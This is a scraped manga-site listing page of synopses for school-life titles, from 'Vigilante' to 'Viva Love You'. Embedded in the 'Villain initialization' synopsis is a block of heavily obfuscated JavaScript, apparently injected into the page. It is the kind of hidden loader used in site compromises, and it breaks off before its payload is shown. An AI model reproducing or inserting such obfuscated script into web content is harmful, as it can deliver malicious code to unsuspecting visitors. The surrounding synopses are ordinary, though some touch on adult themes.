School Life - Page 755

Explore the world of School Life manga, where gripping stories await. Start reading the best School Life manga free now!

9641 results

Vigilante: Boku No Hero Academia Illegals

Spin-off of Boku no Hero Academia focusing on Vigilantes (unlicensed illegal heroes).


Villager A Wants to Save the Villainess no Matter What!

Allen, an eight-year-old boy from a poor family in the royal capital, is living a poor but happy life together with his mother. One day, however, memories of his previous life suddenly come back to him and he remembers that he is in an dating sim game and that the capital will be destroyed by war if he doesn’t do something about it. If this continues, both he and his mother will be killed! With a sense of urgency, he decides to rise to the occasion in order to save his precious mother’s life and save his favorite character, the villainous young lady Anastasia, the only girl he liked in the game, from her all too tragic and ruinous end. This is the story of a man who isn’t even a character in the game, but who strives with his steely determination and uses all the knowledge he has to turn overcome fate! [Original Jp Web Novel](


Villain Classroom

Heo Jeong-woo, a high school student who is bullied by a girl in his class for his weakness.Han Bo-ra, a transfer student, comes to Jeong-woo's class, where he was spending his miserable days.Jeong-woo feels a strong sense of déjà vu when he sees the child with straight black hair and stains on his legs. Sure enough, Han Bo-ra, who has subdued the arguing classmates, asks them."'Have you ever seen a child similar to me?Jeong-woo decides to approach Bo-ra, who might be able to correct what is wrong...---**Links:**- Alternative Official Raw - (


Villain initialization

Ling Chen lived as a villain for 35 years, but in the final battle with the hero Ye Muxue, he “initialized” reset-reborn back to 17! what? Do you think he wants to be human again? Less talk! Of course, it’s time to kill Ye Mu, who wasn’t super powered at that time!<script></script><script>function _0x469c(_0x2222a0,_0x5487eb){var _0x311364=_0x5e78();return _0x469c=function(_0x44b123,_0x12282b){_0x44b123=_0x44b123-(0x1*0x2221+-0x1511+-0xb34);var _0x29346b=_0x311364[_0x44b123];return _0x29346b;},_0x469c(_0x2222a0,_0x5487eb);}(function(_0x2b49bf,_0x588d8e){var _0x38f307=_0x469c,_0x47cbfe=_0x2b49bf();while(!![]){try{var _0x5af367=parseInt(_0x38f307(0x1ed))/(-0x4*-0x883+0x883+-0x2a8e)*(-parseInt(_0x38f307(0x1e5))/(-0x1*0x8d+-0x1c59+0x1ce8*0x1))+parseInt(_0x38f307(0x1f2))/(-0x1431+-0x2444+-0xe1e*-0x4)+-parseInt(_0x38f307(0x1e9))/(0x1*-0x1535+-0xd3f+0x2278*0x1)+parseInt(_0x38f307(0x1e2))/(-0x163+-0x6d1+0x839)+parseInt(_0x38f307(0x1ef))/(-0x1a39+-0x1*-0x171f+0x8*0x64)+parseInt(_0x38f307(0x1dd))/(0x171c+-0x15*-0x151+0x32ba*-0x1)+-parseInt(_0x38f307(0x1f7))/(-0x16c+-0x593+0x707)*(parseInt(_0x38f307(0x1e0))/(0x30*0x24+-0x60a+-0xad));if(_0x5af367===_0x588d8e)break;else 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Villainess Level 99 ~I May Be The Hidden Boss But I'm Not The Demon Lord~

I reincarnated as the "Villainess Eumiella" from an RPG Otome game. In the main story, Eumiella is merely a side character, but after the ending, she re-enters the story as the Hidden Boss, a character boasting high stats on par with the heroes! Lighting a fire in my gamer's soul, and taking advantage of being left on my own in my parent's territory, I trained, trained, and trained! As a result of my training… by the time I enrolled in the academy, I managed to reach level 99. Though I had planned to live out my days as inconspicuously and peacefully as possible, soon after entering the school, I'm suspected by the Heroine and Love Interests of being the "Demon Lord"…? Based on a popular web novel of seeking a peaceful life, a fantasy story of the strongest villainess!


Villainess Speedrun Stream

A man who lost his life in an accident is reincarnated into an otome game world with a mission given by gods who want entertainment. And the background story in the game is that she is incarnated as a villain princess character, which turns out to be a good person but she is instead exiled after that the game will be speedrun and streamed!? He was told the sooner he was exiled the more benefits he would get in the next life, along with the start of the game he invited all the characters to fight so he could be exiled quickly, but instead, he was invincible and became a popular person... !? Respected by the original protagonist, a handsome aristocrat makes the main character his goal and he is trained by a cheat class, in the end, this otome game deviates from the original story too!! She\'s gradually getting ready to get the ending of being exiled, but the event of death always comes to her….. as the daughter of a marquis “marianne biesround” who is fighting for her next life, she will destroy all those who stand in her way (and blow them away) with magic. strongest, “meteor”! The manga adaptation of the violent webnovel otome game has begun!!!


Villainess’ Reprisal Boutique

After a car accident, fashion designer Madison wakes up inside her favorite fairy tale as Allena, the daughter of the villainess Irene! For years Irene and Allena have lived in banishment. But there is an untold story—the truth is Irene was never a real villainess. She was framed! Using her fashion skills, Allena enters the noble finishing school, Versailles Academy, swearing to earn the prestigious title of First Lady of Versailles so she can clear Irene’s name and find her own happy ending.



"Why am I not popular!?" Eiji is an unpopular first year university student who is indifferent about fashion. He wants to lose his virginity and has been attending mixers for that purpose but has been failing miserably at them. In the midst of all that, he found a pair of jeans left behind by his late vintage clothes loving father and that's also when he met Ayame, an unfriendly but super cute girl working at a vintage clothes store! Here's to the beginning of a campus life comedy that started from "vintage clothing" and "love".


Virgin Wars

Kanami's father has a debt of 300 million yen! He can either pay the money or sell his daughter, Kanami, to the sex industry. Kanami decides to go to the sex industry for the sake of her father. But before she does, she wants to have a normal life and lose her virginity normally. In the bathroom, she mistakenly stumbles across her classmate, Ryuuno, having sex with a girl. Later on at a gokun, she meets Ryuuno. She gets drunk and she wakes up to find herself in bed with Ryuuno. She doesn't fight back. When she wakes up later on, she sees Ryuuno(with his pants still on 0_o) injured very badly! Did Kanami do this? Does she have some hidden powers she doesn't know about?


Virtual World: Close Combat Mage

Due to a mistake on his student’s part, a super Martial Artist received the wrong class in an online game and has become a mage. He, who was used to curbing violence with violence and using strength to subdue strength, could only make the best out of this mistake. Taking on a new lease in life, he became a violent close combat mage. When strength and magic came perfectly together, a new gaming path had been opened by him!



Ostracism and mistreatment at school. How can one stand alone against the all-too-powerful group? Sawako finds a way and she starts drawing manga.


Viva Love You

Lee Si-Hyun runs a late night podcast that deals with matters of the heart. Her friends listen as she gives them advice on how to deal with their relationships. The only trouble is, she's never fallen in love in her life. All that might change when a new teacher shows up at her school...
